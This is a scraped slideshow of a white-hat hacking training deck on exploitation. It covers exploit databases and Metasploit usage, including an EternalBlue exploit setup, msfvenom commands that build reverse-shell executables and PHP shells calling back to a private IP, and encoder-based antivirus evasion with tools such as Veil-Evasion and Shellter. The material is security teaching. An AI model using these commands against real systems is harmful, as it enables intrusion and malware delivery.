Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Practical White Hat Hacker Training - Exploitation

1,356 views

Published on

This presentation part of Prisma CSI's Practical White Hat Hacker Training v1

PRISMA CSI • Cyber Security and Intelligence www.prismacsi.com

This document can be shared or used by quoted and used for commercial purposes, but can not be changed. Detailed information is available at https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode.

Published in: Education
  • Login to see the comments

Practical White Hat Hacker Training - Exploitation

  1. 1. www.prismacsi.com © All Rights Reserved. 1 Practical White Hat Hacker Training #5 Exploitation This document may be quoted or shared, but cannot be modified or used for commercial purposes. For more information, visit https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode.tr
  2. 2. www.prismacsi.com © All Rights Reserved. 2 Exploit Stage Topics • What is an exploit? • Types of exploits • Local, remote and 0day exploits • Exploit Databases • Example Exploit Scenarios • Exploit Execution and Usage Scenarios • Exploit Frameworks • Payload Concept • Metasploit Framework • Antivirus Evasion Software • Veil-Evasion • Shellter • Application
  3. 3. www.prismacsi.com © All Rights Reserved. 3 Basic Concepts • What’s an exploit? • The name given to tools developed to exploit a vulnerability. • Also called exploitation code. • Local Exploit • Remote Exploit • Web Exploit • DoS Exploit • 0day Exploit • What’s a Payload? • A piece of malicious code that performs a given desired action after an exploit
  4. 4. www.prismacsi.com © All Rights Reserved. 4 Exploit Databases • A holding container for a massive number of exploits. Discovered/detected software and service exploits can be searched for in these databases. • Exploit-db.com • Securityfocus.com • 0day.today • Exploits.shodan.io • Iedb.ir • Cxsecurity.com/exploit • Rapid7.com/db
  5. 5. www.prismacsi.com © All Rights Reserved. 5 Exploit Development Languages • In which programming languages are exploits generally written? • Python • C / C++ • Perl • PHP • Ruby • Why was the Framework concept conceived? • Metasploit Framework example
  6. 6. www.prismacsi.com © All Rights Reserved. 6 Exploit Execution / Use– Demo
  7. 7. www.prismacsi.com © All Rights Reserved. 7 Exploit Editing • Exploits don’t execute on every system. • Parameters may vary according to features such as operating system, processor architecture, system language. • In this case you may need to edit the exploit and then execute it afterwards. • Replicas of target system can be created in a laboratory environment for experiments. • Assume you only have one chance to attack! • A system crash may be the end of everything.
  8. 8. www.prismacsi.com © All Rights Reserved. 8 Exploit Example - Scenario • Consider a bank’s credit calculation area! • Where is the calculation performed? ( Server? Client? ) • What if we perform the request specified in the scenario thousands of times within a minute? • This is an example of a simple DoS ExploitJ
  9. 9. www.prismacsi.com © All Rights Reserved. 9 Exploit Frameworks • Metasploit Community • Metasploit Pro • Core Impact • Exploithub • BeEF
  10. 10. www.prismacsi.com © All Rights Reserved. 10 Metasploit Framework • Metasploit Framework • Installation • Basic Commands • Auxiliary modules • Exploit use • Payload listi and Meterpreter use • Output analysis • Post Exploitation
  11. 11. www.prismacsi.com © All Rights Reserved. 11 Metasploit Framework • It’s an open source software. • Pro version is available but the community version will be sufficient for this course . • Exploits • Payloads • Auxiliary modules • Encoders • Post exploits
  12. 12. www.prismacsi.com © All Rights Reserved. 12 Metasploit Framework • Visit the link below for installation instructions: • https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers • Update: • msfupdate
  13. 13. www.prismacsi.com © All Rights Reserved. 13 Metasploit Framework
  14. 14. www.prismacsi.com © All Rights Reserved. 14 Metasploit Framework • Start • Begin by typing msfconsole in the command line. • You can check the database status with the following command: • db_status
  15. 15. www.prismacsi.com © All Rights Reserved. 15 Metasploit Framework • Workspace concept • Use the workspace to list all the available workspaces. • workspace -a prisma creates a prisma workspace. • workspace prisma Switch to prisma workspace. • workspace -d prisma delete the prisma workspace.
  16. 16. www.prismacsi.com © All Rights Reserved. 16 Metasploit Framework
  17. 17. www.prismacsi.com © All Rights Reserved. 17 Metasploit Framework • Working with Nessus, Nmap outputs You can use the output of scanning software in integration with metasploit. This is one of the best features of the Metasploit Framework. • db_import nmap.xml import nmap output. • db_import nessus-report.nessus import nessus output. • db_export -f xml /tmp/prisma.xml export the data in your workspace.
  18. 18. www.prismacsi.com © All Rights Reserved. 18 Metasploit Framework
  19. 19. www.prismacsi.com © All Rights Reserved. 19 Metasploit Framework
  20. 20. www.prismacsi.com © All Rights Reserved. 20 Metasploit Framework • Workspace data : • hosts • services • creds • loots
  21. 21. www.prismacsi.com © All Rights Reserved. 21 Metasploit Framework • Hosts command • Db_nmap –sS –Pn –n 10.0.1.0/24 You can perform nmap scans with the command. host command can be used to view all IP addresses discovered from the output of this command. • hosts –h You can access all the command functions with the above command • hosts –R Used to add addresses to the RHOST parameter.
  22. 22. www.prismacsi.com © All Rights Reserved. 22 Metasploit Framework
  23. 23. www.prismacsi.com © All Rights Reserved. 23 Metasploit Framework • Services command • db_nmap –sS –Pn –n 10.0.1.0/24 –sV Used to execute an nmap scan. After the output of this command, you can view the ports on all IP addresses and the services running on them with the services command. • services –h . You can access all the services command functions with the above command • services –p 445 • services –S http • services –p 80 -R
  24. 24. www.prismacsi.com © All Rights Reserved. 24 Metasploit Framework
  25. 25. www.prismacsi.com © All Rights Reserved. 25 Metasploit Basic Command List • help • Help command • banner • Allows you to take awesome screenshotsJ • info • Get information on any plugin • info exploit/windows/smb/psexec • search • Search command • search ms17-010
  26. 26. www.prismacsi.com © All Rights Reserved. 26 Metasploit Basic Command List • use • Select an exploit • use exploit/windows/smb/psexec • set • Exploit • info • Acquire information on any plugin • info exploit/windows/smb/psexec • search • Search command • search ms17-010
  27. 27. www.prismacsi.com © All Rights Reserved. 27 Metasploit Framework - Help
  28. 28. www.prismacsi.com © All Rights Reserved. 28 Metasploit Framework - Banner
  29. 29. www.prismacsi.com © All Rights Reserved. 29 Metasploit Framework - Info
  30. 30. www.prismacsi.com © All Rights Reserved. 30 Metasploit Basic Command List • set • Used to assign values to a parameter. • set RHOST 10.0.1.5 • setg • Used to assign a parameter value as global. • unset • Used to reset parameter values. • show • Show namesJ • use • Activates a plugin.
  31. 31. www.prismacsi.com © All Rights Reserved. 31 Metasploit Basic Command List • run and exploit • Used to run a plugin. • load and unload • Used to activate or deactivate a module. • exit • Exiting command
  32. 32. www.prismacsi.com © All Rights Reserved. 32 Metasploit Show Command • show payloads • List Payloads • show targets • List operating systems suitable for attacks with a given plugin • show options • Show setting parameters for a plugin • show encoders • List all encoders
  33. 33. www.prismacsi.com © All Rights Reserved. 33 Auxillary Modules and Use • show auxillary • search smb_login • use auxillary/dos/windows/rdp/ms12_020 • set RHOST • set RPORT • run
  34. 34. www.prismacsi.com © All Rights Reserved. 34 Exploit Attempt (MS17-010) • search netapi • info exploit/windows/smb/ms17_010_eternalblue • use exploit/windows/smb/ms17_010_eternalblue • show options • set payload windows/meterpreter/bind_tcp • set LHOST, • set RHOST • set RPORT • exploit
  35. 35. www.prismacsi.com © All Rights Reserved. 35 Payload Examples • set PAYLOAD windows/meterpreter/reverse_http • set PAYLOAD windows/shell/bind_tcp • set PAYLOAD linux/x86/meterpreter/reverse_https • set PAYLOAD php/meterpreter/bind_tcp • set PAYLOAD java/meterpreter/bind_tcp • set PAYLOAD /windows/vncinject/reverse_tcp
  36. 36. www.prismacsi.com © All Rights Reserved. 36 Reverse/Bind Shell
  37. 37. www.prismacsi.com © All Rights Reserved. 37 Session Management • exploit/multi/handler • Can be used as a listener. • Listener can be run as a job to get connections from multiple targets. • jobs : • exploit –j • jobs command is used for listing jobs.
  38. 38. www.prismacsi.com © All Rights Reserved. 38 Session Management • You can manage all sessions obtained with the sessions command. • sessions –l : list sessions • session –i 1 : 1. Interact with session • sessions –K : end all sessions • sessions –u : upgrade a session to meterpreter session • kill : used to kill a session. • background : takes the session into the background and returns to the metasploit console.
  39. 39. www.prismacsi.com © All Rights Reserved. 39 Exploit Search • Searchsploit
  40. 40. www.prismacsi.com © All Rights Reserved. 40 What’s Msfvenom? • There may be no direct vulnerability in the target system. • In this case, it may be necessary to try to penetrate the system in different ways. • For example if a created malicious .exe file is somehow successfully uploaded and executed on a system then the system can be captured. • Or you might want to upload a malicious shell written in php on to a web application with a file upload vulnerability and get a terminal connection on metasploit. • That's where msfvenom comes into play!
  41. 41. www.prismacsi.com © All Rights Reserved. 41 Msfvenom Use • Msfvenom basic commands • msfvenom -h • msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.10.10 lport=1337-f exe > shell.exe • msfvenom -p php/meterpreter/reverse_tcp lhost=172.16.10.10. lport=4444 -f raw > exp.php • msfvenom - p windows/meterpreter/reverse_tcp lhost=172.16.10.10 lport=4444 -f war -a x86
  42. 42. www.prismacsi.com © All Rights Reserved. 42 Msfvenom AV Evasion- Demonstration • msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.10.10 lport=1337 -e x86/shikata_ga_nai -i 15 -f exe -o shell.exe
  43. 43. www.prismacsi.com © All Rights Reserved. 43 Msfvenom Help
  44. 44. www.prismacsi.com © All Rights Reserved. 44 Msfvenom PHP Payload Contents
  45. 45. www.prismacsi.com © All Rights Reserved. 45 Download Metasploit Additional Plugins • https://github.com/darkoperator/Metasploit-Plugins
  46. 46. www.prismacsi.com © All Rights Reserved. 46 Loading Metasploit Features • Files are added manually under ~/.msf4/plugin/
  47. 47. www.prismacsi.com © All Rights Reserved. 47 Armitage Use • Metasploit Framework GUI • Used to perform actions quickly • The interface is a little easier to use compared to the console application
  48. 48. www.prismacsi.com © All Rights Reserved. 48 Armitage Use • Adding a host
  49. 49. www.prismacsi.com © All Rights Reserved. 49 Armitage Use • Host scanning
  50. 50. www.prismacsi.com © All Rights Reserved. 50 Armitage Use • Scan Results
  51. 51. www.prismacsi.com © All Rights Reserved. 51 Armitage Use • Finding an attack vector
  52. 52. www.prismacsi.com © All Rights Reserved. 52 Armitage Use • Java_rmi_attack
  53. 53. www.prismacsi.com © All Rights Reserved. 53 Armitage Use • Java_rmi_attack • Meterpreter session
  54. 54. www.prismacsi.com © All Rights Reserved. 54 Antivirus Evasion Tools • An antivirus mechanism may be found in target systems. • In this case the attacks should be performed with much more caution. • There are tools developed to bypass antiviruses. • Used tools • Veil-Evasion • Shellter • Av0id • Msfvenom
  55. 55. www.prismacsi.com © All Rights Reserved. 55 Veil-Evasion Installation
  56. 56. www.prismacsi.com © All Rights Reserved. 56 Veil-Evasion Payload Selection
  57. 57. www.prismacsi.com © All Rights Reserved. 57 Veil-Evasion Payload Configuration
  58. 58. www.prismacsi.com © All Rights Reserved. 58 Veil-Evasion Payload Creation - DEMO
  59. 59. www.prismacsi.com © All Rights Reserved. 59 Virustotal Scanning
  60. 60. www.prismacsi.com © All Rights Reserved. 60 Shellter Installation
  61. 61. www.prismacsi.com © All Rights Reserved. 61 Shellter Use – DEMO
  62. 62. www.prismacsi.com © All Rights Reserved. 62 Virustotal Scanning
  63. 63. www.prismacsi.com © All Rights Reserved. 63 Applications
  64. 64. www.prismacsi.com © All Rights Reserved. 64 Questions?
  65. 65. www.prismacsi.com © All Rights Reserved. 65 www.prismacsi.com info@prismacsi.com 0 850 303 85 35 /prismacsi Contacts

×